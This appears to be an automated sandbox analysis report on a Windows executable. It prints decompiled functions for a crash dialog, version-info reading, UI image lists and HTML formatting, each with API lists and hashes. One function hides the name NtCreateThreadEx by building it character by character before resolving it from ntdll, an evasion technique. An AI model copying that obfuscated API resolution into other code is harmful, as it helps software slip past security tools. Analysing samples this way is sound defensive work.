                                                                                                                                                                  0x00408ae3
                                                                                                                                                                  0x00408aeb
                                                                                                                                                                  0x00408af3
                                                                                                                                                                  0x00408b76
                                                                                                                                                                  0x00408b8a
                                                                                                                                                                  0x00408b91
                                                                                                                                                                  0x00408b98
                                                                                                                                                                  0x00408bb1
                                                                                                                                                                  0x00408bb3
                                                                                                                                                                  0x00408bc6
                                                                                                                                                                  0x00408bcc
                                                                                                                                                                  0x00408bda
                                                                                                                                                                  0x00408be0
                                                                                                                                                                  0x00408bf3
                                                                                                                                                                  0x00408bfa
                                                                                                                                                                  0x00408c0b
                                                                                                                                                                  0x00408c12
                                                                                                                                                                  0x00408c17
                                                                                                                                                                  0x00408c1a
                                                                                                                                                                  0x00408c2c
                                                                                                                                                                  0x00408c39
                                                                                                                                                                  0x00408c3d
                                                                                                                                                                  0x00408c3f
                                                                                                                                                                  0x00408c41
                                                                                                                                                                  0x00408c52
                                                                                                                                                                  0x00408c58
                                                                                                                                                                  0x00408c58
                                                                                                                                                                  0x00408c6f
                                                                                                                                                                  0x00408c71
                                                                                                                                                                  0x00408c73
                                                                                                                                                                  0x00408c83
                                                                                                                                                                  0x00408c89
                                                                                                                                                                  0x00408c89
                                                                                                                                                                  0x00408c8a
                                                                                                                                                                  0x00408c8f
                                                                                                                                                                  0x00408c91
                                                                                                                                                                  0x00408c9a
                                                                                                                                                                  0x00408c93
                                                                                                                                                                  0x00408c93
                                                                                                                                                                  0x00408c93
                                                                                                                                                                  0x00408c9f
                                                                                                                                                                  0x00408ca5
                                                                                                                                                                  0x00408caf
                                                                                                                                                                  0x00408cbc
                                                                                                                                                                  0x00408cc2
                                                                                                                                                                  0x00408cc7
                                                                                                                                                                  0x00408ccd
                                                                                                                                                                  0x00408cd0
                                                                                                                                                                  0x00408cd6
                                                                                                                                                                  0x00408cd7
                                                                                                                                                                  0x00408cd8
                                                                                                                                                                  0x00408cde
                                                                                                                                                                  0x00408ce3
                                                                                                                                                                  0x00408ceb
                                                                                                                                                                  0x00408cfe
                                                                                                                                                                  0x00408d03
                                                                                                                                                                  0x00408d06
                                                                                                                                                                  0x00408d0c
                                                                                                                                                                  0x00408d21
                                                                                                                                                                  0x00408d27
                                                                                                                                                                  0x00408d0c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408ca7
                                                                                                                                                                  0x00408ca7
                                                                                                                                                                  0x00408cad
                                                                                                                                                                  0x00408d28
                                                                                                                                                                  0x00408d2e
                                                                                                                                                                  0x00408d35
                                                                                                                                                                  0x00408d36
                                                                                                                                                                  0x00408d42
                                                                                                                                                                  0x00408d48
                                                                                                                                                                  0x00408d4e
                                                                                                                                                                  0x00408d54
                                                                                                                                                                  0x00408d5a
                                                                                                                                                                  0x00408d60
                                                                                                                                                                  0x00408d66
                                                                                                                                                                  0x00408d6c
                                                                                                                                                                  0x00408d72
                                                                                                                                                                  0x00408d73
                                                                                                                                                                  0x00408d7f
                                                                                                                                                                  0x00408d85
                                                                                                                                                                  0x00408d8a
                                                                                                                                                                  0x00408d8f
                                                                                                                                                                  0x00408d90
                                                                                                                                                                  0x00408da8
                                                                                                                                                                  0x00408db9
                                                                                                                                                                  0x00408dbf
                                                                                                                                                                  0x00408dc5
                                                                                                                                                                  0x00408dc5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408cad
                                                                                                                                                                  0x00408ca5
                                                                                                                                                                  0x00408af6
                                                                                                                                                                  0x00408afc
                                                                                                                                                                  0x00408b07
                                                                                                                                                                  0x00408b2a
                                                                                                                                                                  0x00408b38
                                                                                                                                                                  0x00408b53
                                                                                                                                                                  0x00408b56
                                                                                                                                                                  0x00408b62
                                                                                                                                                                  0x00408b6a
                                                                                                                                                                  0x00408b6a
                                                                                                                                                                  0x00408b2a
                                                                                                                                                                  0x00408b07
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • EndDialog.USER32 ref: 00408B20
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00408B38
                                                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00408B56
                                                                                                                                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00408B62
                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00408B6A
                                                                                                                                                                  • memset.MSVCRT ref: 00408B91
                                                                                                                                                                  • memset.MSVCRT ref: 00408BB3
                                                                                                                                                                  • memset.MSVCRT ref: 00408BCC
                                                                                                                                                                  • memset.MSVCRT ref: 00408BE0
                                                                                                                                                                  • memset.MSVCRT ref: 00408BFA
                                                                                                                                                                  • memset.MSVCRT ref: 00408C12
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00408C1A
                                                                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00408C3D
                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00408C6F
                                                                                                                                                                  • memset.MSVCRT ref: 00408CC2
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00408CD0
                                                                                                                                                                  • memcpy.MSVCRT(?,0040F850,0000021C), ref: 00408CFE
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00408D21
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00408D90
                                                                                                                                                                  • SetDlgItemTextW.USER32 ref: 00408DA8
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00408DB2
                                                                                                                                                                  • SetFocus.USER32(00000000), ref: 00408DB9
                                                                                                                                                                  Strings
                                                                                                                                                                  • {Unknown}, xrefs: 00408BA5
                                                                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                                                                                  • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                                                                  • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                                                                  • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                                                                  • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                                                                                                  0x0040b04d
                                                                                                                                                                  0x0040b05e
                                                                                                                                                                  0x0040b060
                                                                                                                                                                  0x0040b063
                                                                                                                                                                  0x0040b06a
                                                                                                                                                                  0x0040b06d
                                                                                                                                                                  0x0040b076
                                                                                                                                                                  0x0040b07b
                                                                                                                                                                  0x0040b07e
                                                                                                                                                                  0x0040b084
                                                                                                                                                                  0x0040b08e
                                                                                                                                                                  0x0040b0a8
                                                                                                                                                                  0x0040b0aa
                                                                                                                                                                  0x0040b0ad
                                                                                                                                                                  0x0040b0b0
                                                                                                                                                                  0x0040b0b3
                                                                                                                                                                  0x0040b0b6
                                                                                                                                                                  0x0040b0b8
                                                                                                                                                                  0x0040b0bb
                                                                                                                                                                  0x0040b0be
                                                                                                                                                                  0x0040b0c1
                                                                                                                                                                  0x0040b0c4
                                                                                                                                                                  0x0040b0c7
                                                                                                                                                                  0x0040b0ca
                                                                                                                                                                  0x0040b0cd
                                                                                                                                                                  0x0040b0cd
                                                                                                                                                                  0x0040b0e5
                                                                                                                                                                  0x0040b11f
                                                                                                                                                                  0x0040b128
                                                                                                                                                                  0x0040b0e7
                                                                                                                                                                  0x0040b0e7
                                                                                                                                                                  0x0040b0f1
                                                                                                                                                                  0x0040b0f2
                                                                                                                                                                  0x0040b0f3
                                                                                                                                                                  0x0040b0fb
                                                                                                                                                                  0x0040b0fd
                                                                                                                                                                  0x0040b0fe
                                                                                                                                                                  0x0040b11d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b11d
                                                                                                                                                                  0x0040b13c
                                                                                                                                                                  0x0040b151
                                                                                                                                                                  0x0040b166
                                                                                                                                                                  0x0040b17b
                                                                                                                                                                  0x0040b190
                                                                                                                                                                  0x0040b1a5
                                                                                                                                                                  0x0040b1ba
                                                                                                                                                                  0x0040b1cf
                                                                                                                                                                  0x0040b1d6
                                                                                                                                                                  0x0040b1d7
                                                                                                                                                                  0x0040b1d8
                                                                                                                                                                  0x0040b1de
                                                                                                                                                                  0x0040b1e3

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                                                                  • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                                                                  • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                                                                  • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040B128
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                  • API String ID: 1223191525-1542517562
                                                                                                                                                                  • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                                                                  • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                                                                  • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                                                                  • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                  			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                                                                                                                  0x0040a1f8
                                                                                                                                                                  0x0040a26d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a26f
                                                                                                                                                                  0x0040a205
                                                                                                                                                                  0x0040a20b
                                                                                                                                                                  0x0040a20d
                                                                                                                                                                  0x0040a213
                                                                                                                                                                  0x0040a214
                                                                                                                                                                  0x0040a215
                                                                                                                                                                  0x0040a216
                                                                                                                                                                  0x0040a217
                                                                                                                                                                  0x0040a219
                                                                                                                                                                  0x0040a21f
                                                                                                                                                                  0x0040a223
                                                                                                                                                                  0x0040a227
                                                                                                                                                                  0x0040a22b
                                                                                                                                                                  0x0040a22f
                                                                                                                                                                  0x0040a233
                                                                                                                                                                  0x0040a237
                                                                                                                                                                  0x0040a23b
                                                                                                                                                                  0x0040a23f
                                                                                                                                                                  0x0040a243
                                                                                                                                                                  0x0040a247
                                                                                                                                                                  0x0040a24b
                                                                                                                                                                  0x0040a24f
                                                                                                                                                                  0x0040a253
                                                                                                                                                                  0x0040a257
                                                                                                                                                                  0x0040a25b
                                                                                                                                                                  0x0040a25f
                                                                                                                                                                  0x0040a269
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a26c
                                                                                                                                                                  0x0040a271

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,00008288), ref: 0040A263
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                                                                  • API String ID: 2574300362-1257427173
                                                                                                                                                                  • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                                                                  • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                                                                  • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                                  			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                                                                                                                  0x00407f9b
                                                                                                                                                                  0x00407fa3
                                                                                                                                                                  0x00407fad
                                                                                                                                                                  0x00407fb9
                                                                                                                                                                  0x0040802e
                                                                                                                                                                  0x00408032
                                                                                                                                                                  0x00408038
                                                                                                                                                                  0x0040803e
                                                                                                                                                                  0x00407fbb
                                                                                                                                                                  0x00407fc9
                                                                                                                                                                  0x00407fd0
                                                                                                                                                                  0x00407fe0
                                                                                                                                                                  0x00407fe5
                                                                                                                                                                  0x00407ff7
                                                                                                                                                                  0x00408015
                                                                                                                                                                  0x0040801b
                                                                                                                                                                  0x00408021
                                                                                                                                                                  0x00408021
                                                                                                                                                                  0x00408051
                                                                                                                                                                  0x00408051
                                                                                                                                                                  0x00408059
                                                                                                                                                                  0x00408065
                                                                                                                                                                  0x00408069
                                                                                                                                                                  0x0040806f
                                                                                                                                                                  0x00408087
                                                                                                                                                                  0x00408087
                                                                                                                                                                  0x0040809c
                                                                                                                                                                  0x004080bb
                                                                                                                                                                  0x004080d1
                                                                                                                                                                  0x004080de
                                                                                                                                                                  0x004080e2
                                                                                                                                                                  0x004080ea
                                                                                                                                                                  0x004080fb
                                                                                                                                                                  0x00408105
                                                                                                                                                                  0x00408115
                                                                                                                                                                  0x00408121
                                                                                                                                                                  0x00408127
                                                                                                                                                                  0x00408150

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00407FD0
                                                                                                                                                                  • memset.MSVCRT ref: 00407FE5
                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                                                                  • SHGetFileInfoW.SHELL32 ref: 00408015
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                                                                  • LoadImageW.USER32 ref: 004080B4
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                                                                  • LoadImageW.USER32 ref: 004080D1
                                                                                                                                                                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                                                                  • DeleteObject.GDI32 ref: 00408121
                                                                                                                                                                  • DeleteObject.GDI32 ref: 00408127
                                                                                                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 304928396-0
                                                                                                                                                                  • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                                                                  • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                                                                  • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                                  			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                                                                                                  0x0040ae90
                                                                                                                                                                  0x0040aeab
                                                                                                                                                                  0x0040aeb2
                                                                                                                                                                  0x0040aec0
                                                                                                                                                                  0x0040aec7
                                                                                                                                                                  0x0040aecc
                                                                                                                                                                  0x0040aed3
                                                                                                                                                                  0x0040aeda
                                                                                                                                                                  0x0040aee1
                                                                                                                                                                  0x0040aee1
                                                                                                                                                                  0x0040aee7
                                                                                                                                                                  0x0040aeea
                                                                                                                                                                  0x0040aeed
                                                                                                                                                                  0x0040aef9
                                                                                                                                                                  0x0040aefe
                                                                                                                                                                  0x0040af05
                                                                                                                                                                  0x0040af07
                                                                                                                                                                  0x0040af08
                                                                                                                                                                  0x0040af13
                                                                                                                                                                  0x0040af18
                                                                                                                                                                  0x0040af19
                                                                                                                                                                  0x0040af26
                                                                                                                                                                  0x0040af2b
                                                                                                                                                                  0x0040af2b
                                                                                                                                                                  0x0040af2e
                                                                                                                                                                  0x0040af34
                                                                                                                                                                  0x0040af43
                                                                                                                                                                  0x0040af44
                                                                                                                                                                  0x0040af4f
                                                                                                                                                                  0x0040af54
                                                                                                                                                                  0x0040af55
                                                                                                                                                                  0x0040af62
                                                                                                                                                                  0x0040af67
                                                                                                                                                                  0x0040af70
                                                                                                                                                                  0x0040af76
                                                                                                                                                                  0x0040af7a
                                                                                                                                                                  0x0040af82
                                                                                                                                                                  0x0040af88
                                                                                                                                                                  0x0040af8d
                                                                                                                                                                  0x0040af97
                                                                                                                                                                  0x0040af9f
                                                                                                                                                                  0x0040afa5
                                                                                                                                                                  0x0040afa9
                                                                                                                                                                  0x0040afb1
                                                                                                                                                                  0x0040afb7
                                                                                                                                                                  0x0040afbd

                                                                                                                                                                  APIs
